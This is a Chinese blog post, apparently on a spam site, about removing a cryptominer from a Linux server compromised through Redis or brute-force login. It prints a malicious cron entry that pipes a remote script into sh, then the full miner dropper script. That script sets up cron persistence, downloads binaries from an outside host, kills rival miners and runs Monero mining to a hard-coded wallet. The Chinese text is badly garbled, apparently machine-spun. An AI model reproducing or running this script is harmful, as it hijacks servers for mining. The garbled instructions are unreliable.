必赢手机app下载 / Blog / 必赢手机app下载 / 服务器LIUNX之如何解决矿机问题

服务器LIUNX之如何解决矿机问题

点步入的主干都以蒙受liunx变矿机的同伴吧(cpu运载300%)
卡的连终端都很难展开
开下去现在提醒 大若是, 到xxx网址给钱了事, 但是基本这些网址基本也上不去,
要么是暴力破解, 要么是因而 redis 6379端口
详细情形精通redis安全漏洞

遇见这种主题材料势必:

  • 先要把陡然出现的杂乱无章的占cpu过高的进程kill -stop pid 暂停掉,
    不要品味直接kill -9 pid
  • cd /etc/cron 查看定时职责 假诺在/var/spool/cron那在那之中也看下
  • 私自的定期职务 内容大约是那般的
    */5 * * * * curl -fsSL http://www.hacker.com/ltc/minerd/pm.sh | sh
    意思很显明了, 前边的*/5 * * * * 大家很熟知吧
    curl 是liunx上模仿 浏览器要求的命令 -fsSl
    大概意思正是什么都不显得, 你看见下载音讯 | sh 下载后运转
    来看下脚本内容
  • export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.223" ]; then
        curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.223
    fi
    chmod +x /tmp/ddg.223 && /tmp/ddg.223
    
    CleanTail()
    {
        ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    }
    
    DoYam()
    {
        if [ ! -f "/tmp/AnXqV.yam" ]; then
            curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
        fi
        chmod +x /tmp/AnXqV.yam
        /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
    }
    
    DoMiner()
    {
        if [ ! -f "/tmp/AnXqV" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
        fi
        chmod +x /tmp/AnXqV
        /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    DoMinerNoAes()
    {
        if [ ! -f "/tmp/AnXqV.noaes" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
        fi
        chmod +x /tmp/AnXqV.noaes
        /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "AnXqV" || DoMiner
    ps auxf|grep -v grep|grep "AnXqV" || DoYam
    ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    

     

  • 最后 到 /tmp/中删除全数的公文 完全没什么 记得用ll -a
    看下遮掩的文本, 也要删掉

多么领会没有错的

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关文章

网站地图xml地图